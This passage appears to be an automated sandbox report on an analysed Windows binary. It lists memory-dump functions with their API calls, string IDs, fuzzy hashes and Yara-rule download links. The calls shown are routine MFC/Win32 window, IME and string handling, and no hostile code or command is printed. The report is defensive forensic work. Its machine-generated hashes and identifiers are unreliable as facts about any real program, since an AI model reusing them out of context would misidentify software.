                                      • Opcode ID: a0e022ac2215dfe1e6f67c2e19e6dd38c976a66c205807bc0037a9a5d0d594a4
                                      • Instruction ID: 2b84b2e39c11879530764e33173bd792e12d93c94560161379a564abe2c3b581
                                      • Opcode Fuzzy Hash: a0e022ac2215dfe1e6f67c2e19e6dd38c976a66c205807bc0037a9a5d0d594a4
                                      • Instruction Fuzzy Hash: 70B13B71208301AFE300CF68DD85E6BB7E8FB88715F004A1DF659D22A1C7B5E985CB56
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00442640, Relevance: 30.2, APIs: 20, Instructions: 246COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetPropA.USER32 ref: 00442685
                                      • CallWindowProcA.USER32 ref: 004426AD
                                        • Part of subcall function 004401E0: CallWindowProcA.USER32 ref: 00440206
                                        • Part of subcall function 004401E0: RemovePropA.USER32 ref: 0044021E
                                        • Part of subcall function 004401E0: RemovePropA.USER32 ref: 0044022A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Prop$CallProcRemoveWindow
                                      • String ID:
                                      • API String ID: 2276450057-0
                                      • Opcode ID: a1a769ed7ecc1795f4146dfdc517d9978fb74cb931c550b9e1de25835f62459d
                                      • Instruction ID: f2913eb92510d0de6212f23a4df99b9d2da70319acdf26a8877a75fc8859964c
                                      • Opcode Fuzzy Hash: a1a769ed7ecc1795f4146dfdc517d9978fb74cb931c550b9e1de25835f62459d
                                      • Instruction Fuzzy Hash: 22614B766443156BF220AB14ED44FAF7758EB86362F500537FA00933A2DBAC9D05C6BE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00444BFE, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 170stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0044D085: TlsGetValue.KERNEL32(00471280,?,00000000,0044C696,0044BFA0,0044C6B2,00448804,0044A2B4,?,00000000,?,004436DC,00000000,00000000,00000000,00000000), ref: 0044D0C4
                                      • CallNextHookEx.USER32(?,00000003,?,?), ref: 00444C28
                                      • GetClassLongA.USER32 ref: 00444C6F
                                      • GlobalGetAtomNameA.KERNEL32 ref: 00444C9B
                                      • lstrcmpiA.KERNEL32(?,ime,?,?,?,Function_0004BFA0), ref: 00444CAA
                                      • GetWindowLongA.USER32 ref: 00444D1D
                                      • SetWindowLongA.USER32(?,000000FC,00000000), ref: 00444D3E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Long$Window$AtomCallClassGlobalHookNameNextValuelstrcmpi
                                      • String ID: AfxOldWndProc423$ime
                                      • API String ID: 3731301195-104836986
                                      • Opcode ID: 40709cd23be8d8c9259912a349a504ca242b8aae11d90bd81e16fd574dd5ef31
                                      • Instruction ID: 2d2f466404bbe2e7ee92028e0a8c5fff2ffad6bdabc7e2856b2558698f5b7ad4
                                      • Opcode Fuzzy Hash: 40709cd23be8d8c9259912a349a504ca242b8aae11d90bd81e16fd574dd5ef31
                                      • Instruction Fuzzy Hash: 5651E371900215ABEB119F24DC48BAF7BB8FF85365F144626F919A72A2C738DD40CB98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00446688, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 174windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00446FC7: GetWindowLongA.USER32 ref: 00446FD3
                                      • GetParent.USER32(?), ref: 004466B3
                                      • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 004466D6
                                      • GetWindowRect.USER32 ref: 004466EF
                                      • GetWindowLongA.USER32 ref: 00446702
                                      • CopyRect.USER32 ref: 0044674F
                                      • CopyRect.USER32 ref: 00446759
                                      • GetWindowRect.USER32 ref: 00446762
                                      • CopyRect.USER32 ref: 0044677E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Rect$Window$Copy$Long$MessageParentSend
                                      • String ID: ($@
                                      • API String ID: 808654186-1311469180
                                      • Opcode ID: fda55c1c2b3b7bd705ea99a6d160d99963d51d7286166a209f48fc4ba0d4d20a
                                      • Instruction ID: 6e6e92ef86b245a170319472d85748aa6982e8d49233734fb95fe6a209e82997
                                      • Opcode Fuzzy Hash: fda55c1c2b3b7bd705ea99a6d160d99963d51d7286166a209f48fc4ba0d4d20a
                                      • Instruction Fuzzy Hash: 1051A571E00219ABEB10DBA8DC85FEEBBBDAF45314F164126F901F3291D634ED058B69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0042D2D8, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 68libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(USER32,00000000,?,76925D80,0042D411,?,?,?,?,?,?,?,00446770,00000000,00000002,00000028), ref: 0042D2FA
                                      • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 0042D312
                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042D323
                                      • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 0042D334
                                      • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 0042D345
                                      • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 0042D356
                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042D367
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: AddressProc$HandleModule
                                      • String ID: EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                      • API String ID: 667068680-2376520503
                                      • Opcode ID: 9d4718986dcc9b03da3de3d820c5593d0a0252a0324ee13543a534e0df81d892
                                      • Instruction ID: 4c9ef30fbcf4defc4eba49f941341b31a008136b44c5abc2490ae2287f3332ab
                                      • Opcode Fuzzy Hash: 9d4718986dcc9b03da3de3d820c5593d0a0252a0324ee13543a534e0df81d892
                                      • Instruction Fuzzy Hash: C41172B1A01625DAA350EF35ACC052EBAA4F20CB457A8083FD508D2292C7B844C98B5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004344FC, Relevance: 22.8, APIs: 15, Instructions: 319windowkeyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Focus$MessageParentStateWindow$BeepDialogItemNext
                                      • String ID:
                                      • API String ID: 741152546-0
                                      • Opcode ID: 38580c3679820c58698e1c370fd1a2775eacbfda56565cb2d3e8b230350ba044
                                      • Instruction ID: cfcce112013b3be1b1ae25183199dbe7e74a8ba5b1e4c831b6a49819f93dfb68
                                      • Opcode Fuzzy Hash: 38580c3679820c58698e1c370fd1a2775eacbfda56565cb2d3e8b230350ba044
                                      • Instruction Fuzzy Hash: 11A1E131900215ABDF24AF65C846BEF7BA5EF8D355F10602BF801A7661CB3CFD418A69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00440F90, Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 44stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • EnterCriticalSection.KERNEL32(00472D20,76922D10,74E32E90,?,?,?,?,?,?,?,?,?,?,?,?,004405A7), ref: 00440FA7
                                      • GetProfileStringA.KERNEL32(windows,kanjimenu,roman,?,00000009), ref: 00440FD0
                                      • lstrcmpiA.KERNEL32(?,kanji,?,?,?,?,?,?,?,?,?,?,?,?,004405A7), ref: 00440FE2
                                      • GetProfileStringA.KERNEL32(windows,hangeulmenu,english,?,00000009), ref: 00441005
                                      • lstrcmpiA.KERNEL32(?,hangeul,?,?,?,?,?,?,?,?,?,?,?,?,004405A7), ref: 00441011
                                      • LeaveCriticalSection.KERNEL32(00472D20,?,?,?,?,?,?,?,?,?,?,?,?,004405A7), ref: 00441023
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CriticalProfileSectionStringlstrcmpi$EnterLeave
                                      • String ID: english$hangeul$hangeulmenu$kanji$kanjimenu$roman$windows
                                      • API String ID: 1105401458-111014456
                                      • Opcode ID: a27779b9088efbc9adc50235863c355637d7cb4030b0b9654f1e0e73a05b68e6
                                      • Instruction ID: 18b73ee476673299e654731a5ea524e4a200d5d967f9c927f06438e4b5427abb
                                      • Opcode Fuzzy Hash: a27779b9088efbc9adc50235863c355637d7cb4030b0b9654f1e0e73a05b68e6
                                      • Instruction Fuzzy Hash: 3901473524034579E220AB24FC01F8B3FD8D764B45F144032F688E35B2FAB8954C96AF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044ECE2, Relevance: 22.7, APIs: 15, Instructions: 210memorystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenA.KERNEL32(?,00460638), ref: 0044ED5B
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 0044ED80
                                      • SysAllocString.OLEAUT32(?), ref: 0044ED86
                                      • lstrlenA.KERNEL32(?,00460638), ref: 0044EDAD
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 0044EDD2
                                      • SysAllocString.OLEAUT32(?), ref: 0044EDD8
                                      • lstrlenA.KERNEL32(?,0000F108,?,00000100,0045FA30,00460638), ref: 0044EE35
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 0044EE5A
                                      • SysAllocString.OLEAUT32(?), ref: 0044EE60
                                      • lstrlenA.KERNEL32(?,?,?), ref: 0044EE85
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?), ref: 0044EEAA
                                      • SysAllocString.OLEAUT32(?), ref: 0044EEB0
                                      • lstrlenA.KERNEL32(?,?,?), ref: 0044EEDC
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001,?,?), ref: 0044EEFF
                                      • SysAllocString.OLEAUT32(00000000), ref: 0044EF05
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: AllocByteCharMultiStringWidelstrlen
                                      • String ID:
                                      • API String ID: 792254170-0
                                      • Opcode ID: 0e82886fb6a36f6c9a399b1dd155bc9247894e4d6762e40fed9c40cc3b8de5d9
                                      • Instruction ID: 66b54e2606957aae5e2e2c8e3ebc3aafc35a25c3b732139ee8d0380cbe776d4c
                                      • Opcode Fuzzy Hash: 0e82886fb6a36f6c9a399b1dd155bc9247894e4d6762e40fed9c40cc3b8de5d9
                                      • Instruction Fuzzy Hash: 05714C70900209BFDB10DFA6C84599EBBA4FF09360F10859AF814DB361D739CA42CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004408E1, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 107COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowLongA.USER32 ref: 004408FD
                                      • RemovePropA.USER32 ref: 00440933
                                      • SetWindowLongA.USER32(?,000000FC,00000000), ref: 00440939
                                      • RemovePropA.USER32 ref: 00440967
                                      • SetWindowLongA.USER32(?,000000FC,00000000), ref: 0044096D
                                      • GetWindow.USER32(?,00000005), ref: 004409C2
                                      • GetWindow.USER32(00000000,00000002), ref: 004409D3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Window$Long$PropRemove
                                      • String ID: @-G
                                      • API String ID: 3256693057-1196022286
                                      • Opcode ID: 8e7ab8488151ab238c578b1839cd8e3be53bed05b361f59f79c4f0409ef4c09f
                                      • Instruction ID: 256cad188e55339d907f7dcb71a73d6fb99225b7caf1bbdb56b15a4cf5a7d02f
                                      • Opcode Fuzzy Hash: 8e7ab8488151ab238c578b1839cd8e3be53bed05b361f59f79c4f0409ef4c09f
                                      • Instruction Fuzzy Hash: 2D213AA71145156AF711A7786C00EBF229CDB8A325B110136FA08D2263FBB8CC5247BD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00440000, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 83stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Prop$Window$ClassLongNameUnicodelstrcmpi
                                      • String ID: edit
                                      • API String ID: 4088303749-2167791130
                                      • Opcode ID: 9ca7a60e8d51135fe90e038251a5d71b7edf98906b42dbe3d035c0c993d2aa8e
                                      • Instruction ID: a19d20411be811070a978075a2afc8035fbec320119771eae87b39da7784bf41
                                      • Opcode Fuzzy Hash: 9ca7a60e8d51135fe90e038251a5d71b7edf98906b42dbe3d035c0c993d2aa8e
                                      • Instruction Fuzzy Hash: AD2181661015126AA350BB79AC04FBF22DC9F49745B004531FE08D2632F768CD4297BE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044F00E, Relevance: 19.9, APIs: 13, Instructions: 385stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 0044F044
                                      • VariantClear.OLEAUT32(?), ref: 0044F2E7
                                      • VariantClear.OLEAUT32(?), ref: 0044F30E
                                      • SysFreeString.OLEAUT32(00000000), ref: 0044F372
                                      • SysFreeString.OLEAUT32(?), ref: 0044F387
                                      • SysFreeString.OLEAUT32(?), ref: 0044F39C
                                      • VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 0044F3D7
                                      • VariantClear.OLEAUT32(?), ref: 0044F3E7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Variant$ClearFreeString$ChangeTypelstrlen
                                      • String ID:
                                      • API String ID: 3956376494-0
                                      • Opcode ID: 2d49c0045146ee641043d69e4850d90746c89de475d310f7d13373f4d89ee691
                                      • Instruction ID: e42b9aba9f91c3a64b8849c904713d4d33eee83e1785caca611516527b1e21e8
                                      • Opcode Fuzzy Hash: 2d49c0045146ee641043d69e4850d90746c89de475d310f7d13373f4d89ee691
                                      • Instruction Fuzzy Hash: 56E1BF7590020ADFEF10DFA8C880AAEBBB4FF44304F24456AF911A7261D779AD15CF69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00443460, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 52libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?), ref: 00443474
                                      • GetProcAddress.KERNEL32(00000000,DisableThreadLibraryCalls), ref: 00443480
                                      • EnterCriticalSection.KERNEL32(00472D20), ref: 0044349C
                                      • GetVersion.KERNEL32 ref: 004434AE
                                      • GetSystemMetrics.USER32 ref: 004434F2
                                      • GetSystemMetrics.USER32 ref: 004434FC
                                      • GetSystemMetrics.USER32 ref: 00443506
                                      • GetSystemMetrics.USER32 ref: 0044350F
                                      • LeaveCriticalSection.KERNEL32(00472D20), ref: 0044351B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: MetricsSystem$CriticalSection$AddressEnterHandleLeaveModuleProcVersion
                                      • String ID: DisableThreadLibraryCalls$KERNEL32.DLL
                                      • API String ID: 1414939872-3863293605
                                      • Opcode ID: a7bcca54881bc7c3514cb91cd31bd39b35042531d1c1c857726edbaab2f92e8f
                                      • Instruction ID: 20908dd0915890d9e79644aaab1c60c6af654ecee896380fef3af270d58e08bd
                                      • Opcode Fuzzy Hash: a7bcca54881bc7c3514cb91cd31bd39b35042531d1c1c857726edbaab2f92e8f
                                      • Instruction Fuzzy Hash: 6E117370840315ABE720AF64AE0978B3FA0EF04706F04843BF54997270E7B98584CF8E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043FA9E, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 221COMMON
                                      Download Yara Rule
                                      APIs
                                      • CompareStringW.KERNEL32(00000000,00000000,004614D0,00000001,004614D0,00000001,00000000,02370E7C,00429BC6,0000000B,?,0043A363,00435D0D), ref: 0043FADC
                                      • CompareStringA.KERNEL32(00000000,00000000,004614CC,00000001,004614CC,00000001,?,0043A363,00435D0D,?,?,?,00435B80), ref: 0043FAF9
                                      • CompareStringA.KERNEL32(00429BC6,00000000,00000000,00435B80,?,?,00000000,02370E7C,00429BC6,0000000B,?,0043A363,00435D0D), ref: 0043FB57
                                      • GetCPInfo.KERNEL32(?,00000000,00000000,02370E7C,00429BC6,0000000B,?,0043A363,00435D0D,?,?,?,00435B80), ref: 0043FBA8
                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,0043A363,00435D0D,?,?,?,00435B80), ref: 0043FC27
                                      • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,]C,?,?,0043A363,00435D0D,?,?,?,00435B80), ref: 0043FC88
                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,FFFFFFFF,00000000,00000000,?,0043A363,00435D0D,?,?,?,00435B80), ref: 0043FC9B
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,FFFFFFFF,?,00000000,?,0043A363,00435D0D,?,?,?,00435B80), ref: 0043FCE7
                                      • CompareStringW.KERNEL32(?,?,00429A3B,FFFFFFFF,?,00000000,?,00000000,?,0043A363,00435D0D,?,?,?,00435B80), ref: 0043FCFF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ByteCharCompareMultiStringWide$Info
                                      • String ID: ]C
                                      • API String ID: 1651298574-391739762
                                      • Opcode ID: 79e58333b598a3e7eaf2ec5a4f3438e0575bcd63f31c7c688008162cbbab562c
                                      • Instruction ID: 000e64e140063156ac67654bd188ec8a40f4037c3464a99ccbf11fa4f3be0811
                                      • Opcode Fuzzy Hash: 79e58333b598a3e7eaf2ec5a4f3438e0575bcd63f31c7c688008162cbbab562c
                                      • Instruction Fuzzy Hash: 2671CDB1D00249ABCF218F54DC55AEBBFBAEB0D300F14113BF951A6260D3399C59DB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00441220, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      • EnterCriticalSection.KERNEL32(00472D20,?,0044067F), ref: 00441226
                                      • GlobalDeleteAtom.KERNEL32 ref: 00441262
                                      • GlobalDeleteAtom.KERNEL32 ref: 0044127D
                                      • GlobalDeleteAtom.KERNEL32 ref: 00441290
                                      • GlobalDeleteAtom.KERNEL32 ref: 004412A3
                                      • GlobalDeleteAtom.KERNEL32 ref: 004412B6
                                      • GlobalDeleteAtom.KERNEL32 ref: 004412C9
                                      • GlobalDeleteAtom.KERNEL32 ref: 004412DC
                                      • LeaveCriticalSection.KERNEL32(00472D20,?,0044067F), ref: 004412ED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: AtomDeleteGlobal$CriticalSection$EnterLeave
                                      • String ID: 08G
                                      • API String ID: 3843206905-604853322
                                      • Opcode ID: 07563f844e0819c67e4b61401bbddb11fda3beccf18eb196bf6cce1fa347444b
                                      • Instruction ID: c4c161cac4519d59901495873330fd105bcfc6aeb2e51354b89c12a26c229f73
                                      • Opcode Fuzzy Hash: 07563f844e0819c67e4b61401bbddb11fda3beccf18eb196bf6cce1fa347444b
                                      • Instruction Fuzzy Hash: 2A111F5980061591E7352BA4EE0C7A637B4F708701F0444A7E918EBAF0E7FC48C6CBAD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00442DE0, Relevance: 16.7, APIs: 11, Instructions: 199COMMON
